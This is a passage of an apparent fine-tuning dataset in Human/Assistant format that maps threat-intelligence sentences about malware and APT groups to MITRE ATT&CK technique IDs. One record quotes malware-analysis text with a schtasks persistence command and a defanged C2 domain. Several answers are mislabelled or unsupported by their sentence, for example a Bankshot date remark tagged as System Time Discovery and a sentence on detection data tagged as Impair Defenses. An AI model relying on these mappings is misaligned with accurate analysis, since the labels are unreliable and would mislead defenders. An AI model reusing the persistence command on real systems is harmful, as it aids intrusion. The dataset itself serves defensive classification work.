payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Strider has registered its persistence module on domain controllers as a Windows LSA password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After creating a digital certificate, an adversary may then install that certificate on infrastructure under their control.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware then sets the hijacked service to start automatically to establish persistence.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD samples were found to be highly obfuscated with junk code.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has used phishing lure documents that trick users into opening them and infecting their computers.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 collects the computer name, the BIOS model, and execution path.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has also used PowerShell scripts to load and execute malware in memory.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec harvests plain-text credentials as a password filter registered on domain controllers.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used a script to attempt RPC authentication against a number of hosts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses the command net time \\127.0.0.1 to get information the system’s time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has used RDP to move laterally to systems in the victim environment.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck checks its directory location in an attempt to avoid launching in a sandbox.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or initial access or Hardware Additions.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses -w Hidden to conceal a PowerShell window that downloads a payload.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used DNS tunneling for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke exfiltrates collected files automatically over FTP to remote servers.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone can display an RTF document to the user to enable execution of Cobalt Strike stage shellcode.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can scan victim drives to look for specific banking software on the machine to determine next actions.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Infrastructure solutions include physical or cloud servers, domains, and third-party web services.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CrossRAT uses run keys for persistence on Windows Seasalt creates a Registry entry to ensure infection after reboot under HKLM\Software\Microsoft\Windows\currentVersion\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can obtain a list of local groups of users from a system.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""ZR"" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may delete files left behind by the actions of their intrusion activity.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These logon scripts run with the privileges of the user they are assigned to.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM packed some payloads using different types of packers, both known and custom.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has mapped network drives using Net and administrator credentials.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT uses a .bat file to execute a .dll.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug obtained OS version and hardware configuration from a victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke exfiltrates collected files over FTP or WebDAV.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can perform DLL loading.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SamSam uses custom batch scripts to execute some of its components.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer utilizes PsExec to help propagate itself across a network.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can encrypt data with 3DES before sending it over to a C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can use VBS scripts to execute malicious DLLs.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Night Dragon DLL included an XOR-encoded section.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT has a command to obtain a process listing.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has injected code into target processes via thread local storage callbacks.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may clear system logs to hide evidence of an intrusion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 used Remexi to collect usernames from the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can identify the process for a specific security product.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create a domain account to maintain access to victim systems.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can save collected data to disk, different file formats, and network shares.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has delivered a generic Windows proxy Win32/Glubteta.M.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug has used command line during its intrusions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has harvested user's login credentials.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can identify the geographical location of a victim host.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT can launch a remote command shell interface for executing commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise creates a file in AppData\Local\Microsoft\Windows\Explorer and stores all harvested data in that file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used tools to dump passwords from browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used history -c to clear script shell logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets from remote servers.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher contains junk code in its functions in an effort to confuse disassembly programs.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader deobfuscates its code.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas collects keystrokes from the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used the Get-AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon can use Pastebin to receive C2 commands.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt obfuscates configuration data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill can obtain the current date and time of the victim machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates new services to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to ""hidden"".### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious processes are marked red (click image to enlarge): The following malicious files are dropped and run: C:\ProgramData\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\OFFLINE\9A189DFE\C7B7C186\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\Users\Public\Libraries\RecordedTV\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\Users\Public\Libraries\RecordedTV\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 “C:\Windows\System32\schtasks.exe” /create /F /sc minute /mo 3 /tn “GoogleUpdateTasksMachineUI” /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs 7528c387f853d96420cf7e20f2ad1d32 Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two posts by Palo Alto networks and in a post by FireEye, which wrote about previous campaigns by this threat agent### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They also used AdFind to enumerate domains and to discover trust between federated domains.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MS Office documents with embedded VBA content store source code inside of module streams.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy can download additional modules and payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects passwords stored in applications installed on the victim.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can set its ""beacon"" payload to reach out to the C2 server on an arbitrary and random interval.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Phishing for Information, establishing operational resources or Compromise Infrastructure, and/or initial access or Trusted Relationship.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This data is used by security tools and analysts to generate detections.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At this point QueueUserAPC can be used to invoke a function .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has modified the Registry as part of its UAC bypass process.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VaporRage has the ability to download malicious shellcode to compromised systems.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is very similar to Thread Local Storage but creates a new process rather than targeting an existing process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser has established persistence by setting the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key value for wdm to the path of the executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The method adversaries use will depend on the specific mechanism they seek to subvert.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal collected complete contents of the 'Pictures' folder from compromised Windows systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to enumerate the infected system's user name via GetUserNameW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has the ability to use HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has used a valid digital signature from Sectigo to appear legitimate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install malicious components that run on Internet Information Services web servers to establish persistence.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete uses HTTP for Command & Control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has used watering hole attacks to deliver malicious versions of legitimate installers.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to detect anti-virus products and processes on a compromised host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note: aswrundll.exe is very similar to Microsoft’s own rundll32.exe - it allows you to execute DLLs by calling their exported functions### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon has stored its encrypted payload in the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can gather domain and workgroup information.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Briba downloads files onto infected hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used brute-force attack to obtain login data.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 compromised legitimate organizations' websites to create watering holes to compromise victims.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 encrypts C2 traffic using an RC4 key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This user action will typically be observed as follow-on behavior from Spearphishing Link.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern: Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has also used common document file names for other malware binaries.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before executing malicious code, Ragnar Locker checks the Windows API GetLocaleInfoW and doesn't encrypt files if it finds a former Soviet country.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can collect the current time zone information from the victim’s machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can delete files on the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon can collect the external IP address of the victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage can use WMI for execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the ResumeThread API.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used FTP to exfiltrate reconnaissance data out.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke C2 traffic has been encrypted with RC4 and AES.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can scan for network drives which may contain documents for collection.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole uses variations of a simple XOR encryption routine for C&C communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has downloaded PowerShell code from the C2 server to be executed.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has been observed collecting victim machine information like OS version, drivers, volume information and more.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,keylog ### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used rundll32 to load malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla established persistence by adding a Shell value under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the ability to use form-grabbing to extract data from web data forms.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISMInjector creates scheduled tasks to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote desktop is a common feature in operating systems.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete saves the window names.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation.This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNUGRIDE is capable of executing commands and spawning a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim Deobfuscate/Decode Files or Information, potentially bypassing content filters.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to discover drive information on the infected host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron can collect files from a local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 